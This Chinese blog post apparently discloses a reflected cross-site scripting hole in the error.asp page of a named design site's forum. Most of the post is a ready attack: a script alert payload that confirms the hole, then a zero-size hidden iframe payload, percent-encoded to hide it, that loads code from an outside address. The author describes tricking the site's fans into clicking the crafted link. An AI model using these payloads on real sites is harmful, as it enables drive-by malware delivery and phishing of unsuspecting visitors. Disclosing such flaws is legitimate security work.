刚刚到依儿酷站里溜达,那里有很多设计得很好的网页!
因为本人没什么色觉细胞,配色也不行,所以经常去看看里面的Flash网站!.
点击依儿的设计论坛的文章来看
发现跳转到了bbs/error.asp这个页面,重要的是它传递的参数竟然是这样的(看下图):
我试下看<script>alert("ww.alwaysthere.com.cn")</script>作为参数传递,竟然成功了,那就存在跨站脚本攻击的漏洞!
假设:不坏好意者,在参数后加上<iframe src='恶意代码地址' width='0' height='0'></iframe>,再欺骗依儿的Fans们(例如我)点击,则能达到借刀杀人的作用!.
这里我用了<iframe src='www.alwaysthere.com.cn' width='0' heigth='0'></iframe>
再编下码变为:%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%77%77%77%2E%61%6C%77%61%79%73%74%68%65%72%65%2E%63%6F%6D%2E%63%6E%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%74%68%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E
全部的地址就是:
这样就能靠上面的代码执行恶意代码!.
